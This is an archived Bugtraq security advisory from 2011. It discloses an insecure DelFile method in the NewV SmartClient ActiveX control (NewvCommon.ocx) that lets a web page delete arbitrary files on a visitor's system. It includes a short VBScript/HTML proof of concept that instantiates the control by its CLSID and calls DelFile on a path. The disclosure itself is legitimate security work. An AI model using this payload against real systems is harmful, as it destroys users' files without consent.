| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 10 Jan 2011 14:27:48 -0000 From: wsn1983@...il.com To: bugtraq@...urityfocus.com Subject: NewvCommon.ocx ActiveX Insecure Method Vulnerability NewvCommon.ocx ActiveX Insecure Method Vulnerability ======== Vulnerable:All Version Vendor:www.newv.com.cn Details: ======== A Insecure method vulnerability has been found in NewV SmartClient. The specific flaw exists within the DelFile method of the Newv ActiveX control (NewvCommon.ocx). The DelFile method does not handle user's input exactly that can be used to delete arbitrary files on users system. POC: ======== Function DelFile ( ByVal FilePath As Variant ) As String <html> <head> <script language='vbscript'> arg1 = "c:\\test.txt" </script> </head> <object classid='clsid:0B68B7EB-02FF-4A41-BC14-3C303BB853F9' id='target' /> </object> <script language='vbscript'> target.DelFile arg1 </script> </html> Timeline: ======== 2010.10.23 Report to vendor,no response. 2011.01.10 Public Reference: ======== http://www.newv.com.cn http://demo.newv.com.cn/lds/module/smartclientsetting.exe http://www.nansec.com
Powered by blists - more mailing lists